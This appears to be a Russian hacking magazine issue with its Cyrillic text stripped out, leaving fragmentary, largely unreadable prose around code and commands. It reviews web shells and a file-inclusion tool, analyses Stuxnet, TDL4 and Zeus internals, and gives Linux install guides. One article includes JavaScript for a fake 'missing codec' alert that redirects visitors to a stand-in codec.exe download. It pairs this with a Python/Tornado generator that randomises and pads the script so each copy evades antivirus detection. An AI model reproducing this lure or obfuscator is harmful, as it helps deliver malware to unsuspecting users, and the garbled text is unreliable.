good;
error
( , ).
:
1.
txt- (
login;pass , proxy:port);
2. ;
3. START.
,
, ,
.
: Mikstura
: *nix/win
: Dr.TRO
php-.
:
;
, data:, php://
input;
data: php://input,
;
-
;
, , full path,
( 15
"../");
( );
HTTP- perl-
LWP::Protocol::socks.
.
http://forum.
inattack.ru/Mikstura-Mini-utilita-Dlja-RabotyS-Inkludami-t23830.html.
php-.
:). ,
- ITSecTeam Shell v2.1!
:
(66 );
;
;
;
MySQL, MSSQL,
PostgreSQL, Oracle & IBM DB2;
;
, PHP safe mode;
Windows;
;
;
zip ;
;
( php);
;
-;
DoS;
sql/gzip-;
-
;
;
DDoS-;
;
symlink mod_security .htaccess;
;
php;
;
magic_quotes;
.
,
, :).
http://itsecteam.
com/en/tools/itsecteam_shell.htm.
: ICQuinValuer
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: Dank & DeMerk &
NightEagle
.
ICQ-
ICQ-
.
ICQ :
(viz/
inviz) ;
( ,
, , , , , ..);
;
;
;
;
;
.
,
:).
forum.asechka.ru/showthread.php?t=118542.
: Easteregger
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
:
,
. . Eastegger
:).
( ),
.
,
, , , ,
.
.
:
1. (, , );
2. , , , .
,
Torrent. :
.
Help-About Torrent
( Torrent).
torrent .
T
(Tris).
P, .
WSO-
, Eastegger',
:).
http://eastegger.com.
: PWGen
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: Christian Thoeing
.
PWGen,
. :
Free Open-Source;
AES SHA-2;
(
DLL',
Windows);
(
, ,
);
;
;
;
.
,
http://pwgen-win.sourceforge.net. *nix , http://pwgen.sourceforge.net.
WSO. Krist_ALL
, :
(
downloader', , , ,
);
( writable,
);
,
(
INFO);
;
( );
;
INFO;
;
php,
php;
milw0rm;
;
$t
(1 ,
2 );
.
http://exploit.in/forum/index.
php?showtopic=40939.z
MALWARE
lozovsky@gameland.ru
/INTERNET SECURITY
() Malware
. , ,
.
, , ,
:).
, , .
,
, :
anti-malware.ru, ,
- Deeoni$ ,
,
X
1. ,
USB- .
Microsoft Security
Essentials:
, ,
,
.
:
,
,
64- .
2.
: KIS, Dr. Web, Nod32, Symantec.
.
Avast.
3. ,
cloud- Symantec:
,
.
,
Symantec
.
:).
, , :
1. , . ?
2. , .
, .
3. , -
. ?
Security.
. Idle Mode
,
.
: -?. ,
:). , .
Symantec ,
.
,
.
.
exe - , ,
? .. , ,
:
, -
, .
.
, , .
.
, ,
.
1. .
STEP ,
PC_ZONE DVD
: Norton Internet
,
.
(
) ,
- :). IM-,
.
Dr.Web, -
, .
2. Dr.Web . . Spyder, .
,
.
3. :). , 10 KIS.
, ,
.
KIS ,
.
,
X
1. Microsoft
Security Essentials, ,
- .
.
,
,
. -
, , .
2. -: , , AVG,
Essentials. , -
, ,
, .
3. -,
.
,
MALWARE
,
UNIXOID
1. : KIS2011 Dr.Web
1.
, vast!. KIS
( , ,
:)), Dr.Web , 90-
OneHalf.
, , .
, : -,
-
- .
2. Avast! . ,
.
,
,
,
: , ,
.
.
3. Comodo. -,
Internet Security
, .
:), .
,
, ,
, ,
.
Eset Nod32.
, Dr.Web
Cureit!
.
. , :
- (
Win2k3r2) Kerio WinRoute Firewall
McAfee
;
(OpenBSD) Spamd
( greylisting) + Sendmail (
) + Clamav + Procmail ( ,
Maildir);
(WinXP) Eset Nod32
+ Dr.Web Cureit! + Kaspersky Virus Removal
Tool + MalwareBytes Anti-malware + AVZ (
) + Dr.Web LiveCD (
) + Acronis True Image BootCD (
/ ).
2.
Nod32,
.
.
3.
.
, ,
,
ANTI-MALWARE.RU
1.
Windows 7 x64,
,
.
Microsoft
Security Essentials, Avast 5 Free Anti-virus. ,
-
,
.
2. . :
,
,
.
, ,
, Microsoft, Avast Avira.
,
,
Windows XP,
, Kaspersky
Internet Security, Norton Internet
Security BitDefender Internet
Security.
3. ,
. ,
: , :
-
squid (
), havp clamav. : clamav ,
havp . Linux
.
.
DEEONI$,
- X
, , -
,
.
, Symantec
(Norton), Microsoft, Avast Panda.
,
,
,
.
Internet Security Total
Security -
( -).
, (
)
: ,
, , ,
.
,
, ,
.
Norton 360 -,
,
. z
presidentua http://tutamc.com
-
!
!
JS-
Python
.
,
. ?
!
-
.
80
.
JavaScript XOR. .
JavaScript
.
Internet Explorer,
. ,
,
,
.
JavaScript (, ).
:).
, ,
. ,
,
, .
JavaScript .
,
. - ( ,
, , ),
.
,
. ,
.
, .
, +
String.fromCharCode ():
var a = "co" + "de" + String.fromCharCode(69) + "c";
(
) .
JavaScript, go_codec. ,
. , ,
. , ,
, go_codec - SDdsdsW,
go_codec SDdsdsW.
:
Trial-Reset
JavaScripta,
:
<script>
function go_codec()
{
location.href = "http://server/codec.exe";
}
var message = "You don't have codec for video";
alert(message);
setTimeout( go_codec(), 1000);
</script>
.
hex-. Python , :
import random
from string import letters
def morf_html_string(html):
    rez = ''
    for s in html:
        if s in letters and random.choice([True, False, False, False]):
            rez += "&#%s;" % ord(s)
        else:
            rez += s
    return rez
, (in
letters), 25% hex-. , a a.
You don't have codec for video - :
class G(object):
rand_var = {}
.
:
def rand_var(var):
    if var in G.rand_var:
        return G.rand_var[var]
    G.rand_var[var] = generate_string(5, 10)
    return G.rand_var[var]
;
, .
, 5
10 , .
, generate_
string! :
DVD
dvd
, JavaScript
.
,
.
WARNING
warning
.
Internet Explorer.
.
,
. :).
, , , .
- .
:
var b="aaa";
if ("aaaa"=="sdsdsd") asdasdas();
function sfsf(){};
get_el_, - :
def get_el_1():
return "var %s='%s';" % (
generate_string(4,6),
generate_string(4,6)
)
(get_
el_1, get_el_2 get_el_3) :
def random_js_element():
def get_el_1():
return "var %s='%s';" % (
generate_string(),
generate_string()
)
def get_el_2():
return "if ('%s'=='%s') %s();" % (
generate_string(),
generate_string(),
generate_string()
);
def get_el_3():
return "function %s(){}" % (
generate_string())
from tornado.template import Template
template_js = "our_example_template"
js = Template(template_js).generate(
rand_var=rand_var,
morf_html_string=morf_html_string,
random_js_element=random_js_element
)
fnc = "get_el_%s"%random.randrange(1,4)
return locals()[fnc]()
, .
,
locals().
, , :
>>> random_js_element()
'function aErfSA(){}'
>>> random_js_element()
"if ('uHsJi'=='YvEwVNttta') pxQdHssd();"
>>> random_js_element()
"var yrSfsdgS='OywZCvq';"
,
.
, . . Template- - TornadoWeb.
JavaScript. ,
.
,
, JavaScript
:
{{ }}
var a = "{{ (" ") }}"
, , .
Pythona
random randrange
choice. ,
start stop:
random.randrange(start, stop)
.
,
- . , 33%:
if random.choice([True, False, False]):
    print "33.33333%"
string
:
from string import letters
>>> letters
'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
letters ( ),
ascii_letters .
, .
server/codec.exe") }}";
}
var {{ rand_var("message") }} = "{{
morf_html_string("You don't have codec for
video") }}";
alert({{ rand_var("message") }});
setTimeout( {{ rand_var("go_codec") }}(),
1000);
HTTP://WWW
{{ random_js_element() }}
</script>
,
{{ random_js_element() }}
( ). , rand_var - {{
rand_var("go_codec") }}.
{{ morf_html_string("http://server/codec.
exe") }}.
, .
, ,
:
location.href = "http://codec/codec.exe";
:
var a = location;
a.href = "http://codec/codec.exe";
a["h"+"ref"] = "http://codec/codec.exe";
, :
var {{ rand_var("location") }} = location;
{{ rand_var("location") }}["{{ morf_html_
string("href") }} "] = "{{ morf_html_
string("http://codec/codec.exe") }}";
, 2
-
:)
JavaScript-:
def many_random_js(start=0, stop=5):
    rez = ""
    for _ in xrange(random.randrange(start, stop)):
        rez += random_js_element()
    return rez
{{ many_random_js() }}.
. :
, ,
. ,
, JavaScript- . , ,
.
, ,
? .
,
. .
PS: , , !
(-, ,
, , . ) :). z
links
,
:
http://developer.
yahoo.com/yui/compressor/
http://code.google.
com/closure/compiler/
http://jscrambler.
com/
http://javascriptobfuscator.com/
http://www.stunnix.
com/prod/jo/
http://www.crockford.com/javascript/
jsmin.html
http://www.daftlogic.com/projectsonline-javascriptobfuscator.htm
TornadoWeb,
http://www.tornadoweb.org/
Python. ,
collections defaultdict, rand_var.
defaultdict
.
:
>>> a = defaultdict(generate_string)
>>> a["go_codec"]
dqQSfw
>>> a["location"]
EdstEf
>>> a["go_codec"]
dqQSfw
, ESET, www.twitter.com/matrosov
TO-5
2010
,
.
,
,
. 2010 ,
.
Stuxnet
. , Stuxnet
,
.
. , .
Stuxnet ( )
. HIPS-,
. , , , Realtek JMicron.
Microsoft,
, . ? MS! , MS ,
. ,
, , .
.
, Stuxnet .
- ,
, , , .
0-day
,
. MS10-046,
, LNK/PIF-.
,
.
,
,
.
:
tdl
config.ini
File table
TDL3
Lnk-, Stuxnet
TDL4 MBR
. ,
Stuxnet . .
( Vendor-ID) (Task
Scheduler), SYSTEM Vista/Win7/Win2008.
.
, ,
. ,
Smartcard API !
,
( PoC) Microsoft. , ,
:).
CVE-2010-2772, Siemens Simatic
WinCC PCS 7 SCADA, -
, TDL4
[Figure: Stuxnet propagation and installation vectors in MS Windows. Diagram labels: removable devices, local network, propagation, installation, privilege escalation, Win2000/XP, Vista/Win7/Server 2008, MS10-046, MS10-073, MS08-067, MS10-061, MS10-0XX]
Microsoft SQL WinCC.
[Figure labels: TDL3, SeLoadDriver, PrintProcessor, IMAGE_FILE_DLL, ShellExecute, AddPrintProcessor API, DeletePrintProcessor API, DRIVER_SECTION pci.sys, DRIVER_SECTION Driver1.sys]
Stuxnet ,
:
- , Microsoft
Visual C++. , . ,
. -, : , .
,
,
.
P2P,
, , .
, Stuxnet,
. Stuxnet Under the Microscope
70 ,
:).
TDL4
, 64-,
. TDL4
TDL3,
. TDL4
64 Windows.
,
[Figure labels: DRIVER_SECTION Driver2.sys, DRIVER_SECTION DriverN.sys, DRIVER_SECTION Driver32k.sys]
-
MBR
. , Mebroot, StonedBoot . ,
, TDL3 , , 64-
, .
, :
(
\\??\PhysicalDrive0),
C:;
( TDL3 );
MBR-,
;
TDL3
,
, , ,
. , 3.273.
TDL3 2010 ,
( - MS :)) HIPS-.
TDL3.
Stuxnet
HIPS-
WinAPI- AddPrintProcessor
AddPrintProvidor,
HIPS-,
HIPS
Stuxnet
TDL4
TDL3
Dalixi
Zeus2
MBR
PRIVILEGE, / .
, WinAPI-
RtlAdjustPrivilege. ,
%PrintProcessor% AddPrintProcessor/
AddPrintProvidor, tdl. RPC
( ).
TDL3
. ,
.
Hex-Rays ,
. , , , ,
. , , , , ,
. TDL3 , .
BOOL AddPrintProcessor(
__in LPTSTR pName,
__in LPTSTR pEnvironment,
__in LPTSTR pPathName,
__in LPTSTR pPrintProcessorName
);
:
BOOL AddPrintProvidor(
__in LPTSTR pName,
__in DWORD Level,
__in LPBYTE pProviderInfo
);
TDL3 :
;
.
, , SE_LOAD_DRIVER_
TDL3 .
,
,
.
TDL3
, .
.
,
TDL3 ( ,
).
,
.
TDL3
. , ,
, .
:
(tdlcmd.dll);
(config.ini);
(tdl);
(rsrc.dat);
.
, ( ) , TDL3 ,
.
tfd.
exe (TdlFsDumper, http://j.mp/tdl_dump). -
FS .
Dalixi
.
,
Dalixi HIPS
.
, callback-,
.
HIPS ( :
PsSetLoadImageNotifyRoutine, PsSetCreateProcessNotifyRoutine,
PsSetCreateThreadNotifyRoutine). ,
, . Dalixi
ZwSystemDebugControl, ntdll.dll.
NTSYSAPI
NTSTATUS
NTAPI
NtSystemDebugControl(
    IN SYSDBG_COMMAND Command,
    IN PVOID InputBuffer OPTIONAL,
    IN ULONG InputBufferLength,
    OUT PVOID OutputBuffer OPTIONAL,
    IN ULONG OutputBufferLength,
    OUT PULONG ReturnLength OPTIONAL
);
,
SysDbgCopyMemoryChunks_1
, , , .
NtSystemDebugControl
, Dalixi SysDbgCopyMemoryChunks_1 ,
.
InputBuffer , :
typedef struct _CPY_MEM_CHUNCKS_BUFFER
{
void *Destination;
// pointer to kernel-mode destination buffer
void *Source;
// pointer to user-mode source buffer
ULONG Size;
// size of the user-mode source buffer
} CPY_MEM_CHUNCKS_BUFFER, *PCPY_MEM_CHUNCKS_BUFFER;
, ,
Dalixi ,
. callback.
Zeus 2..
Zeus.
,
(
).
, Zeus,
VNC
Jabber.
X.509- , , ,
,
. CryptoAPI PFXImportCertStore
(
).
HCERTSTORE WINAPI PFXImportCertStore(
__in CRYPT_DATA_BLOB *pPFX,
__in LPCWSTR szPassword,
__in DWORD dwFlags
);
, , ,
Zeus ,
Stuxnet.
, zeus-.
, , ,
- .
, ,
.
Zeus ,
,
MS Internet Explorer
. , ,
,
.
, , .
Zeus
.
,
,
-
Smartcard API.
, Zeus,
SpyEye, , ,
, -
. C&C
, , .
.
. , . z
zobnin@gm ail.com
Linux BSD
,
:
, .
, . ,
, .
,
,
. ,
,
.
,
. , ,
, .
,
,
- (, Windows). ,
(,
Linux), .
.
,
.
,
.
Linux,
Windows
-
.
UNetbootin
(unetbootin.sourceforge.net) USB- ,
.
, Ubuntu (www.
ubuntu.com/desktop/get-ubuntu/windowsinstaller) OpenSUSE (en.opensuse.org/
Instlux), UNetbootin
( Linux, BSD,
Linux). ,
, grub4dos ISO- -
UNIXOID
FreeBSD
Windows,
VirtualBox-3.2.10-66523-Win.exe.
,
- ,
.
, :
> cd c:\Program Files\Oracle\VirtualBox
> VBoxManage internalcommands createrawvmdk \
-filename c:\realhd.vmdk \
-rawdisk \\.\PhysicalDrive0 -register
Windows
. .
,
UNIX- , ,
UNIX (,
BSD Linux-). UNetbootin, ISO-
initrd- Grub (
BSD).
Windows Linux.
,
. , ,
Solaris
, . VirtualBox,
(www.virtualbox.org).
FreeBSD Linux.
Linux FreeBSD-,
Ubuntu,
UNetbootin, grub,
:
# cd /usr/ports/sysutils/grub
# sudo make install clean
# mkdir /boot/grub
# cp /usr/local/share/grub/i386-freebsd/* /boot/grub/
# touch /boot/grub/menu.lst
# sysctl kern.geom.debugflags=16
# grub-install /dev/ad0
menu.lst:
# vi /boot/grub/menu.lst
title Ubuntu 10.10 AutoInstall
# X, Y, Z ,
, ISO-
map (hdX,Y,Z)/ubuntu-10.10-server-i386-auto.iso (hd32)
map --hook
chainloader (hd32)
).
,
.
DHCP-, ,
SSH- ,
(, ).
,
SSH.
(
). ,
.
,
ISO- Ubuntu,
.
Ubuntu-10.10 ( ),
(
preseed-). :
1. Ubuntu 10.10
:
$ sudo mount -o loop \
ubuntu-10.10-server-i386.iso /cdrom
$ mkdir mycd
$ rsync -a /cdrom/ mycd
2. preseed- ( ):
$ vi auto.seed
# -
d-i debian-installer/locale string ru_RU
# ,
# ru,
d-i console-setup/ask_detect boolean false
d-i console-setup/layoutcode string us
#
d-i netcfg/choose_interface select auto
# FTP
d-i mirror/protocol string ftp
#
d-i partman-auto/init_automatically_partition select biggest_free
#
d-i partman-auto/choose_recipe select atomic
# Ext4
d-i partman/default_filesystem string ext4
# ,
d-i partman-partitioning/confirm_write_new_label boolean true
d-i partman/choose_partition select finish
d-i partman/confirm boolean true
d-i partman/confirm_nooverwrite boolean true
# user ( resu)
d-i passwd/user-fullname string Ubuntu User
# IP-
d-i netcfg/get_ipaddress string 192.168.0.1
#
d-i netcfg/get_netmask string 255.255.255.0
#
d-i netcfg/get_gateway string 192.168.0.2
#
d-i netcfg/confirm_static boolean true
3. , preseed-:
$ sed -e 's#file=/cdrom/preseed/ubuntu.seed#auto=true\ priority=critical\ file=/cdrom/preseed/auto.seed#' mycd/isolinux/txt.cfg > txt.cfg
$ sudo mv txt.cfg mycd/isolinux/
UNetbootin
d-i passwd/username string user
d-i passwd/user-password-crypted password 458c9bfe3b6716ad976383cf20a3dcf4
d-i user-setup/allow-password-weak boolean true
#
# kubuntu-desktop ubuntu-server,
, us,
,
openssh-server user resu,
SSH.
( DHCP), d-i netcfg/choose_interface
select auto , :
# DNS-
d-i netcfg/get_nameservers string 8.8.8.8
Grub4dos Vista/Seven
1. C: grldr, grldr.mbr menu.lst;
2. Windows:
> bcdedit /create /d "Grub4Dos" /application
bootsector
3. (ID ):
> bcdedit /set ID device partition=C:
> bcdedit /set ID path \grldr.mbr
> bcdedit /displayorder ID /addlast
4. :
$ cd mycd
$ sudo rm md5sum.txt
$ find -type f -print0 | sudo xargs -0 md5sum | \
grep -v isolinux/boot.cat | sudo tee md5sum.txt
5. ISO-:
$ sudo mkisofs -D -r -V "Ubuntu 10.10 AutoInstall" \
-cache-inodes -J -l -b isolinux/isolinux.bin \
-c isolinux/boot.cat -no-emul-boot \
-boot-load-size 4 -boot-info-table \
-o ../ubuntu-10.10-server-i386-auto.iso .
ISO- ,
UNetbootin, ,
ISO-, .
UNetbootin
, ,
UNetbootin , .
ISO-, UNetbootin.
. 30
, .
Debian,
.
,
(, Kickstart RedHat).
UNetbootin. ,
, .
Grub4dos Grub,
FAT32 NTFS-, Ubuntu
WinXP.
Grub4dos
Windows , .
sourceforge.net/projects/grub4dos/
files/, Grub4dos
grldr menu.lst C:. c:/boot.ini
[boot loader] :
default=c:\grld
:
2. rc.conf,
:
WARNING
$ cp conf/rc.conf.sample conf/rc.conf
:
$ vi conf/rc.conf
# IP-
defaultrouter="192.168.0.1"
#
ifconfig_re0="inet 192.168.0.2 netmask 255.255.255.0"
WinXP
, Netbootin
c:\grldr="Grub4Dos"
. c:/menu.lst
:
title Ubuntu 10.10 AutoInstall
find --set-root /ubuntu-10.10-server-i386-auto.iso
map /ubuntu-10.10-server-i386-auto.iso (hd32)
map --hook
chainloader (hd32)
. ISO- C:,
, 30 ,
SSH user resu.
Linux FreeBSD.
, . FreeBSD , Linux, , .
, , , :
Linux,
.
FreeBSD, SSH.
mfsBSD (mfsbsd.vx.sk),
FreeBSD, .
, FreeBSD,
sysinstall. :
1. mfsBSD
:
$ wget mfsbsd.vx.sk/release/mfsbsd-1.0.tar.gz
$ tar xzf mfsbsd-1.0.tar.gz
$ cd mfsbsd-1.0
re0 .
,
(dmesg ),
(
, , re0 RealTek
8139C, re).
,
DHCP,
:
ifconfig_re0="DHCP"
3. - ISO-
FreeBSD ( ftp://ftp.freebsd.org, ):
$ sudo mount -o loop \
FreeBSD-8.1-RELEASE-i386-disc1.iso /cdrom
4.
:
info
Linux
VirtualBox
qemu:
$ sudo qemu -hda /dev/sda -cdrom ubuntu-10.10-desktop-i386.iso -boot d
5. root, :
# dd if=/root/disk.img of=/dev/sda bs=1m
# reboot
root, mfsroot,
sysinstall
FreeBSD.
FTP HTTP.
,
( , ),
.
, , ,
, ,
,
. ,
, , -
. z
UNIXOID
Adept adeptg@gmail.com
OPENSOURCE
, , ,
, .
OpenSource 2010 .
, .
, Sun Microsystems,
, - ,
2008. 2009 , Oracle,
7 .
2010
. , Oracle (
OpenSource) ,
Sun.
, Java ,
Oracle . bugfix security- JDK6.
Oracle
JDK7 JDK8 2011 2012
.
VM
, , unicode, XML
JDBC.
OpenSolaris , Java: Oracle
.
, Solaris
Express. ,
;
( CDDL,
GPL),
. OpenSolaris
.
, Illumos. ,
.
.
Sun Oracle
MySQL. Oracle ,
,
. MySQL,
,
MariaDB. ,
Oracle
MySQL
( Sun).
OpenSource- , Oracle
OpenOffice. 2010 3.2
:
. ,
, , ,
;
MS Office,
,
, ;
OpenType, TrueType;
Calc , .
Sun OpenSource-.
VirtualBox. ,
,
-. ,
(
),
, , USB
RDP-,
RDP-.
, Sun Netbeans.
Oracle . ,
,
. 6.9
( RoR 3, JavaFX
SDK 1.3, ), 2011
7.0.
Linux
Sun , Linux
: 2.6.33-2.6.36.
HTTP://WWW
links
illumos.org
OpenSolaris
www.documentfoundation.org The
Document Foundation
meego.com
Meego
INFO
FireFox 4
info
Oracle
Sun
][ 131.
FireFox 4
,
:
Nouveau . Nouveau
,
Nvidia -. nv , , 3D-;
DRBD (Distributed Replicated
Block Device) , RAID-1 ;
Ceph () LogFS ( SSD);
. ,
btrfs Direct I/O,
.
,
, , .
XFS ,
,
.
.
CIFS
. Squashfs
LZO;
/
PCI, USB SCSI-;
. : ( )
( ).
, , ;
DRM- (Direct Rendering Manager,
Digital Rights Management) Intel
H.264 VC1
G45+;
L2TP 3 (RFC
3931);
: make nconfig.
, menuconfig,
;
AppArmor .
AppArmor
SELinux ,
AppArmor ,
. SELinux .
AppArmor , SELinux
;
Tile,
;
. , .
DE 2010
. changelog Gnome
, 3.0 ( ,
6 2011). ,
2.30 2.32:
UNIXOID
Meego
Nautilus . /
;
GNOME Keyboard Indicator,
;
gnome-system-tools
: ,
;
GNOME Terminal: ,
;
Brasero FileRoller
PackageKit;
Empathy -,
;
- Epiphany gnomekeyring;
IDE Anjuta Python Vala.
Changelog KDE 2010 :
Plasma Netbook ;
Kwin (,
);
;
;
;
Plasma ;
KNetworkManager;
Dolphin ;
Kmail
.
, - k3b 2.0 KDE4
Blu-ray.
KDE 4.6 ( 2011)
:
Kwin;
Nepomuk ;
Plasma ;
PowerDevil v2;
KSnapshot
( ).
,
. OpenSource- Firefox.
netmarketshare.com, 2010
23% . 2010 3.6, 2011 Firefox 4.
FF 3.6:
Acid3 94 100;
15% 3.5;
WOFF.
3.6.2;
Personas;
HTML5- .
FF 3.6 Mozilla
.
,
, .
(3.6.4)
,
. .
Plasma Netbook
Mozilla 2010
: : Sothink Web Video Downloader 4.0 Master
Filer. , ( ),
4600 Windows (
). Mozilla ,
.
Firefox4:
, ;
( Google
Chrome).
- WebM VP8;
,
, .
Mozilla Sync;
64- Linux,
Mac OS X Windows;
JetPack, HTML, CSS
Javascript. XUL,
;
WebGL,
3D- . ;
2D- (,
Vista/Seven. Linux Mac OS X );
App Tab,
.
,
Pin as App Tab;
.
Firefox ,
, Google Chrome/Chromium.
2010 Google Chrome Linux (
5) :
,
JavaScript;
, ;
HTML5, Web Sockets, Drag-and-drop,
GeolocationAPI App Cache.
2010 Chrome :
( Release Early, Release
Often). 6 ,
- :
- Chrome Web Store.
- Google.
Chrome OS. ,
5%
( 30% App Store);
15% ;
Auto-fill.
,
;
.
6 2010 7:
, ;
,
;
UNIXOID
OOo 3.3
OOo 3.3
FileAPI ,
.
Chrome 8 ,
:
2D-
GPU;
WebGL;
;
( , Linux);
:
.
, Ubuntu,
: . 10.04.
, LTS (Long Term Support),
, .
:
. : , , .
LTS-, ;
Nvidia Nouveau;
HAL .
10.10.10 Ubuntu 10.10 :
:
, ,
btrfs, ;
.
, Fluendo. ! , ,
;
Netbook edition Canonical
Unity.
, Canonical
. : , (
) ,
gnome-settings-daemon 100% . ,
.
11.04 ( Natty Narwhal, )
Ubuntu Developer Summit:
GNOME 3.0 (GNOME Shell)
Unity. Netbook edition
Desktop edition CD;
- banshee. , ,
Ubuntu mono (f-spot), .
;
, 2.6.38, X.Org Server 1.10 (
X.Org Server 1.09 1.10),
Mesa 7.10, Radeon X1000 (R500)
R300 Gallium3D;
ARM,
.
Ubuntu, Debian, 2010
. , ,
. ,
2010. ,
:
backports.org backports.debian.org. ,
;
rolling- ()
Debian;
Debian: snapshot.debian.org,
. ,
.
RPM-based , Fedora,
, 13 14 :
Btrfs. Yum ;
Python 3, Python 2.
D;
Spice (Simple Protocol for Independent
Computing Environments) ,
QEMU. ,
.
;
MeeGo;
OpenSCAP. SCAP (Security Content Automation Protocol)
,
. OpenSCAP , SCAP, ,
, oscap-scan
, OVAL XCCDF.
BSD- FreeBSD 2010
: 7.3 8.1. 8.1 :
ZFSv14;
/
, , 2010,
Linux .
Linux Google Android
2010 . ,
Android- Apple iPhone
( , ),
Android Market 100 000.
2010 Android 2.2 :
Adobe Flash 10.1;
Microsoft Exchange;
Dalvik JIT, ;
Wi-Fi;
. ,
;
.
2010 Android 2.3.
:
WebM;
;
;
.
Android ,
Linux . ,
1-2 , . ,
Meego Maemo (Linux
Nokia) Moblin (Linux Intel).
Linux Foundation. Android , Meego
( VCS-, BSD). Meego :
, CarPC.
(1.1) :
Linux 2.6.35, GCC 4.5.0;
X.Org 1.9.0.
Meego ;
Qt 4.7 ,
;
Btrfs.
, ;
Zypper, RPM-;
oFono,
ConnMan;
Tracker;
Bluetooth- BlueZ, D-BUS, GStreamer PulseAudio.
,
-.
Meego AppUp,
Intel Moblin. , , , Meego, ,
(Nokia N900 Aava Mobile). , ( ) ;
.
, Meego (Nokia N9)
2011.
KDE.
.
BackTrack.
2.6.34 Fluxbox-. NMAP
: 2010
5.20, 5.30BETA1 5.35DC1
:
UDP-;
100 NSE (Nmap Scripting Engine) ;
600 1300
;
Nping,
;
.
1.4.1 Wireshark (
Ethereal):
80 ;
Python ( *nix, Windows
);
;
JPEG RTP-
Wireshark;
( libpcap 1.0.0 );
( libpcap 1.0.0 ).
- Nikto : 2.1.1-2.1.3.
, :
, ;
2300 RFI (remote file inclusion) ;
;
;
Libwhisker
IDS;
XML- SSL.
2010 Canonical ,
Ubuntu Desktop 12
. .
Linux . 1-2%
.
, 2010
, , Linux
. ,
, Linux (
).z
UNIXOID
hatchet maks.hatchet@yandex.ru
, ,
, Linux BSD-
, ,
.
,
. , ,
, Linux-,
,
Linux ,
4 .
:
,
: swap,
, Linux, /home.
Linux-,
. . ,
Linux- , .
-
,
:
, , ,
/home-
, .
, , .
:
gparted, parted,
.
, ,
.
parted. - :
$ sudo apt-get install parted
/home:
$ sudo telinit 1
# umount /home
/home
Linux , LiveCD parted. SystemRescueCD (www.sysresccd.org,
DVD) .
parted :
$ sudo parted /dev/sda
print,
.
( ),
,
(
, , , 62,9GB).
resize _.
Start
<Enter>, End ,
2010 , 63
(,
62,8GB). quit
.
. ,
,
LiveCD parted
.
fdisk resize2fs e2fsprogs (
Ext2, Ext3 Ext4). LiveCD, :
# fdisk -l
/
home. , ,
fsck /home (
/dev/sda7)
# fsck -n /dev/sda7
/dev/sda7
, . fdisk:
# fdisk /dev/sda
'd' ( ) (/dev/sda7 =
7).
'n', 'l' ( ).
,
fdisk -l. <Enter> ( fdisk
, ). 'p',
,
'w'. LiveCD.
:
# fsck -f /dev/sda7
resize2fs ,
:
# resize2fs /dev/sda7
:
# fsck -n /dev/sda7
# reboot
UUID
.
,
,
,
. ,
, .
,
.
Linux
: unionfs, aufs2 mhddfs.
, ,
, aufs2
. mhddfs (Multi-HDD FileSystem, mhddfs.uvw.ru) fuse- ,
,
.
,
, . ,
,
(
).
/mnt/disk1, /mnt/disk2 /mnt/disk3,
Music. :
/home/vasya/Music. unionfs :
INFO
info
fstab
Ubuntu
UUID,
blkid:
$ sudo blkid /dev/sda1
dd
,
:
$ sudo watch -n60 killall -SIGUSR1 dd
aufs2 :
$ sudo mount -t aufs none /home/vasya/Music -o br:/mnt/disk1/Music=rw:/mnt/disk2/Music=rw:/mnt/disk3/Music=rw,create=mfs,sum
mhddfs :
$ sudo apt-get install mhddfs
$ sudo mhddfs /mnt/disk1/Music,/mnt/disk2/Music,/mnt/disk3/Music /home/vasya/Music -o mlimit=10G
UNIXOID
NTFS-
1. ntfsprogs:
$ sudo apt-get install ntfsprogs
2. NTFS-:
$ sudo umount /dev/sda1
GParted
, . ( mfs)
,
.
, 10
, ,
.
,
/etc/fstab:
none /home/vasya/Music aufs br:/mnt/disk1/Music=rw:/mnt/disk2/Music=rw:/mnt/disk3/Music,create=mfs,sum 0 0
,
,
? , Linux , .
:
, / (
).
, Ubuntu 10.10. , ,
.
:
1. LiveCD.
2. , .
Ubuntu ( swap), :
/home. (
cfdisk gparted ) swap.
.
3.
(/dev/sda , /dev/sdb ):
# mkdir /mnt/{root1,root2,home1,home2}
# mount /dev/sda1 /mnt/root1
# mount /dev/sdb1 /mnt/root2
# mount /dev/sda2 /mnt/home1
# mount /dev/sdb2 /mnt/home2
.
4. :
# cp -ax /mnt/root1/* /mnt/root2
# cp -ax /mnt/home1/* /mnt/home2
3. :
$ sudo ntfsresize -s 10000M /dev/sda1
4. fdisk NTFS-
10000 ;
5. Windows
.
# vi /etc/fstab
/dev/sda1 / ext4 errors=remount-ro 0 1
/dev/sda2 /home ext4 defaults 0 2
/dev/sda3 none swap sw 0 0
8. exit chroot, ,
, , .
,
,
. dd:
# dd if=/dev/sda of=/dev/sdb bs=4k
,
,
,
, . , dd
.
2010
Western Digital,
512 4 ( Advanced
Format). , ,
.
, , Linux, BSD WinXP/
Win2k3, ,
( 3-/4-
).
WD : Windows- WD Align,
512 (
)
;
,
Grub2
- :
# dd if=/dev/sda bs=4k | netcat < IP- > 1234
-:
# netcat -l -p 1234 | dd of=/dev/sdb bs=4k
dd
,
dd, ( , ):
# mount /dev/sda1 /mnt
# dd if=/dev/zero of=/mnt/zero bs=4k
# rm -f /mnt/zero
512- ,
, .
, Linux, , ,
. ,
, ,
cfdisk.
64 . fdisk '-u':
# fdisk -u /dev/sdb
'n' ( ), 'p' ( ),
'1' ( ),
64,
( ,
512).
'w'. :
# mkfs.ext4 /dev/sdb1
# mount /dev/sdb1 /mnt
,
. ,
,
WD , , WinXP
, .
.
. ,
63
( , 20
, ,
).
, ,
. cfdisk
,
parted "--align optimal",
.
, , , , ,
. ,
, . z
CODING
stann ic.man@gmail.com
CSRSS
, Windows 7
: Windows, Microsoft ,
.
, ,
!
, , ,
- CSRSS,
,
, . ,
, .
, , Nimda. , ,
CSRSS , CSRSS ,
. ,
.
, .
(!) BSOD, Windows,
: 0x0000004C (FATAL_UNHANDLED_HARD_ERROR) 0xC000021A (STATUS_SYSTEM_PROCESS_TERMINATED)
(winlogon.exe
csrss.exe). Windows
. , , csrss.exe (
, ),
, (
).
CSRSS ,
, , :
%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,3072,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ProfileControl=Off MaxRequestThreads=16
, kernel32!CreateProcess,
kernel32!AllocConsole, kernel32!FreeConsole,
user32!EndTask .
IDA, ,
